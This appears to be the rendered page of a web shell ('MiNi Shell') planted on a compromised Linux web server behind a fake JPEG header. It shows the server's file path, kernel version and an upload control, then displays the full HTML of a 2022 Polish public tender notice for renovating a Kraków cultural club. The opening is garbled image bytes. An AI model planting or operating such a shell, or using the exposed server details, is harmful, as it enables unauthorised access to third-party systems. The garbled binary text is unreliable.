JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220624/0022243501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont Klubu Pod Kasztanami - filii Ośrodka Kultury Kraków – Nowa Huta - etap 1 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Kultury Kraków - Nowa Huta</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351001192</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">os. Zgody 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-949</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@krakownh.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://krakownh.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont Klubu Pod Kasztanami - filii Ośrodka Kultury Kraków – Nowa Huta - etap 1 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4e0bdffe-f271-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00222435</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00005709/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Remont Klubu Pod Kasztanami - filii Ośrodka Kultury Kraków – Nowa Huta - etap 1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.krakow.pl/?bip_id=466&amp;mmi=16636 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.bip.krakow.pl/?bip_id=466&amp;mmi=16636</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu komunikacja odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://obywatel.gov.pl/nforms/ezamowienia oraz poczty<br/>elektronicznej na adres: zamowienia@krakownh.pl<br/>2. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu, musi posiadać konto na ePUAP.<br/>3. Wykonawca składa tylko jedną ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Wraz z formularzem należy złożyć pozostałe dokumenty wskazane w pkt 6.1.1. – 6.1.5. SWZ.<br/>UWAGA!<br/>Uwaga! Wykonawca winien zapoznać się z wytycznymi Urzędu Zamówień Publicznych<br/>udostępnionymi na https://www.uzp.gov.pl/strona-glowna/slideraktualnosci/<br/>jaknalezypodpisacofertewpostacielektronicznej/<br/>jak-nalezy-podpisac-oferte-w postaci-elektronicznej Zgodnie z ww.<br/>wytycznymi podpis składany wyłącznie na ww. „Formularzu do złożenia, zmiany, wycofania oferty lub wniosku” nie wywołuje skutków w odniesieniu do złożonej za jego pomocą oferty Wykonawcy. Oferta bowiem, zgodnie z art. 63 ustawy, a nie ww. formularz elektroniczny za pośrednictwem którego jest przekazywana, musi zostać opatrzona właściwym podpisem. W zakresie procedury podpisywania oferty odpowiednim podpisem, czyli składania właściwego podpisu pod ofertą złożoną w postaci elektronicznej wskazać należy, iż prawidłowym będzie złożenie oferty w ten sposób, że Wykonawca przekazuje Zamawiającemu zaszyfrowany plik zawierający ofertę opatrzoną właściwym podpisem lub plik oferty wraz z plikiem podpisu (w przypadku podpisu zewnętrznego), przy czym opatrzenie oferty podpisem nastąpiło przed zaszyfrowaniem oferty. Dopuszczalne jest również, aby Wykonawca przekazał Zamawiającemu swoją ofertę w tzw. „paczce” dokumentów elektronicznych (tj. w skompresowanym archiwum dokumentów elektronicznych, które najczęściej zapisane jest w formacie ZIP) wraz z właściwym podpisem dołączonym jako plik podpisu do paczki dokumentów elektronicznych przed jej zaszyfrowaniem, o czym wprost stanowi § 8 Rozporządzenia, o którym mowa w pkt 8.4. SWZ. Zatem podpis może zostać złożony bezpośrednio na pliku z ofertą Wykonawcy lub na „paczce” dokumentów elektronicznych zawierających ofertę Wykonawcy. Opatrzenie właściwym<br/>podpisem oferty (lub paczki) następuje przed czynnością jej zaszyfrowania. Złożenie podpisu jedynie na „Formularzu do złożenia, zmiany, wycofania oferty lub wniosku” nie jest równoznaczne ze złożeniem podpisu pod ofertą. Oferta, która została złożona bez opatrzenia właściwym podpisem elektronicznym podlega odrzuceniu na podstawie art. 226 ust. 1 pkt 3 ustawy z uwagi na niezgodność z art. 63 ustawy.<br/>4. Sposób złożenia oferty, w tym zaszyfrowania oferty, opisany został w „Instrukcji użytkownika<br/>systemu miniPortal oraz Regualminie ePUAP”.<br/>5. Identyfikator postępowania został wskazany w pkt 2. SWZ.<br/>6. W Formularzu Oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP oraz poczty<br/>elektronicznej poprzez które Zamawiający będzie komunikował się z Wykonawcą.<br/>7. Wykonawca może przed upływem terminu do składania ofert wycofać ofertę za pośrednictwem<br/>„Formularza do złożenia, zmiany, wycofania oferty lub wniosku”. Sposób wycofania oferty został<br/>opisany w „Instrukcji użytkownika systemu miniPortal-ePUAP”.<br/>8. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów, informacji i oświadczeń oraz ich cyfrowych odwzorowań (w tym tzw. kopii elektronicznych) opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>„złożenia, zmiany, wycofania oferty lub wniosku” oraz „komunikacji” wynosi 150 MB, a plików<br/>przesyłanych za pośrednictwem poczty elektronicznej wynosi 40 MB.<br/>c.d. w Informacjach dodatkowych i w pkt 9 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ośrodek Kultury Kraków-Nowa Huta z siedzibą przy os.<br/>Zgody 1 (31-949 Kraków), działając zgodnie z art. 13 ust. 1 i ust. 2 ogólnego rozporządzenia o<br/>ochronie danych osobowych z dnia 27 kwietnia 2016 roku (dalej: RODO) informuje, że:<br/>1) administratorem danych osobowych przekazanych przez Wykonawcę w ofercie i we wszelkich<br/>dokumentach składanych w postępowaniu o udzielenie niniejszego postępowania jest Zamawiający –<br/>Ośrodek Kultury Kraków-Nowa Huta, os. Zgody 1 w Krakowie,<br/>2) W Ośrodku Kultury Kraków-Nowa Huta został powołany Inspektor Ochrony Danych zgodnie z<br/>postanowieniami RODO, kontakt e-mail: rodo@krakownh.pl, z którym można się kontaktować w<br/>sprawach związanych z przetwarzaniem danych osobowych przez Administratora.<br/>3) Przetwarzanie danych, o których mowa w pkt 1) w celu związanym z niniejszym postępowaniem o<br/>udzielenie zamówienia publicznego następuje na podstawie z art. 6 ust. 1 lit. b i c Rozporządzenia,<br/>4) Odbiorcami danych osobowych będą osoby lub podmioty którym zostanie udostępniona<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych.<br/>5) ww. dane osobowe będą przechowywane zgodnie z art. 78 ustawy Pzp przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia<br/>6) Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>ustawy pzp, konsekwencje niepodania danych wynikają z ustawy pzp.<br/>7) Wykonawcy mają prawo do żądania od Zamawiającego dostępu do swoich danych osobowych, ich<br/>sprostowania, ograniczenia przetwarzania.<br/>8) W związku z przetwarzaniem danych osobowych przez Administratora przysługuje prawo wniesienia<br/>skargi do organu nadzorczego.<br/>9) Nie przysługuje Pani/Panu:<br/>• w zw. z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>• prawo do przenoszenia danych osobowych o którym mowa w art. 20 RODO,<br/>• na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DA.261.1.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie remontu wnętrz, a w szczególności – zmiana lokalizacji kuchni i toalety, dostosowanie toalety do potrzeb osób niepełnosprawnych, wymiana posadzek, powłok ściennych i sufitowych, przebudowa instalacji C.O., przebudowa instalacji elektrycznej i wykonanie instalacji teletechnicznych. Zakres prac 1 Etapu opisuje „Projekt wykonawczy aranżacji wnętrz Klubu POD KASZTANAMI filii Ośrodka Kultury Kraków – Nowa Huta, ul. Płoszczyny 1 w Krakowie” z lipca 2021r.<br/>UWAGA! dokumentacja projektowa załączona do SWZ dotyczy pełnego zamierzenia inwestycyjnego podzielonego na etapy. Zakres robót został ograniczony względem projektu i nie obejmuje:<br/>- robót budowlanych i instalacyjnych w pom. 0.2 – Sala Klubowa 1 i pom. 0.3 – Biuro<br/>- instalacji CCTV (w zakresie zamówienia należy wykonać jedynie okablowanie dla tej instalacji)<br/>- instalacji SSWIN (w zakresie zamówienia należy wykonać jedynie okablowanie dla tej instalacji)<br/>- instalacji klimatyzacji (w zakresie zamówienia należy wykonać odprowadzenie skroplin dla tej instalacji)<br/>- wyposażenia meblowego<br/><br/>Wiążącymi i nadrzędnymi będą w kolejności zapisy: umowy, dokumentacji projektowej, pozostałe załączniki do SIWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45421152-4 - Instalowanie ścianek działowych</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45432100-5 - Kładzenie i wykładanie podłóg</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-08-01 do 2022-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował kryterium<br/>najniższej ceny (100%) 2. Ocenie będą podlegać wyłącznie oferty<br/>nie podlegające odrzuceniu. 3. Oferta która otrzyma największą, łączną ilość punktów uznana zostanie<br/>za najkorzystniejszą.<br/>4. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu<br/>na to, że zostały złożone oferty o takiej samej cenie, wezwie on Wykonawców, którzy złożyli te oferty,<br/>do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach. 5. W toku badania i oceny ofert Zamawiający może żądać od<br/>Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych<br/>dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie<br/>wskazanym przez Zamawiającego. 6. Zamawiający̨ wybiera najkorzystniejsza ̨ ofertę ̨ w terminie<br/>związanią oferta ̨ określonyḿ w SWZ. 7. Jeżeli̇ termin związanią oferta ̨ upłynie przed wyborem<br/>najkorzystniejszej oferty, Zamawiający̨ wezwie Wykonawcę,̨ któregó oferta otrzymała najwyższą ̨<br/>ocenę,̨ do wyrażenia,̇ w wyznaczonym przez Zamawiającegǫ terminie, pisemnej zgody na wybóŕ jego<br/>oferty. 8. W przypadku braku zgody, o której́ mowa powyżej , oferta podlega odrzuceniu, a<br/>Zamawiający̨ zwraca się o wyrażeniė takiej zgody do kolejnego Wykonawcy, któregó oferta została<br/>najwyżej̇ oceniona, chyba zė zachodzą ̨ przesłanki do unieważnieniȧ postepowania</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy – zgodnie z art. 57 pkt 2 ustawy – spełniają warunki udziału w postępowaniu, tj. w zakresie posiadania zdolności technicznej lub zawodowej w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej jedną robotę budowlaną polegającą na remoncie obejmującym roboty ogólnobudowlane w tym remont instalacji elektrycznej i sanitarnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu/-ach, o którym/-ch mowa w pkt<br/>6.1.5.1. SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w<br/>pkt 5.2. SWZ odpowiednio:<br/>a) samego Wykonawcy lub każdego z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia,<br/>b) podmiotu/-ów, na którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty oraz podmiotów, na rzecz których roboty te zostały wykonane, sporządzony wg wzoru stanowiącego załącznik nr 4 do SWZ, oraz z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy, na potwierdzenie spełniania warunku posiadania doświadczenia, o którym mowa w pkt 5.1. SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Oferty, według wzoru stanowiącego Zał. nr 1 do SWZ, wypełniony i podpisany<br/>przez osoby umocowane należycie do reprezentowania Wykonawcy. 2. Wraz z ofertą<br/>Wykonawca składa:1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że<br/>Wykonawca w Formularzu Oferty wskaże dane umożliwiające dostęp do tych dokumentów<br/>samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy danych; 2)<br/>pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, jeżeli w jego imieniu działa osoba, której umocowanie do reprezentowania nie<br/>wynika z dokumentów wymienionych w pkt 1) powyżej; Opisane powyżej zasady stosuje się<br/>odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o<br/>udzielenie niniejszego zamówienia oraz do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby.3) Zobowiązanie podmiotu udostępniającego zasoby do oddania do<br/>dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia, lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów, jako dowód polegania na zdolnościach<br/>technicznych lub zawodowych tego podmiotu, w odniesieniu do warunków udziału w<br/>postępowaniu, o których mowa w pkt. 5.1. SWZ – jeżeli dotyczy4) Oświadczenie, z którego<br/>wynika, które usługi wykonają poszczególni Wykonawcy – przy czym obowiązek ten dotyczy<br/>wyłącznie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 117<br/>ust. 4 ustawy. 5) W celu wstępnego potwierdzenia, że Wykonawca nie podlega wykluczeniu<br/>oraz spełnia warunki udziału w postępowaniu, zgodnie z art. 125 ust. 1 i ust. 5 ustawy, składa on<br/>odrębne następujące oświadczenia: a) o niepodleganiu wykluczeniu z postępowania oraz b) o<br/>spełnianiu warunków udziału w postępowaniu, odpowiednio: i. samego Wykonawcy lub każdego<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia; ii. podmiotu/-ów, na<br/>którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy, według wzorów<br/>zaproponowanych odpowiednio w formularzach A, B, C i D zał. nr 2 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga 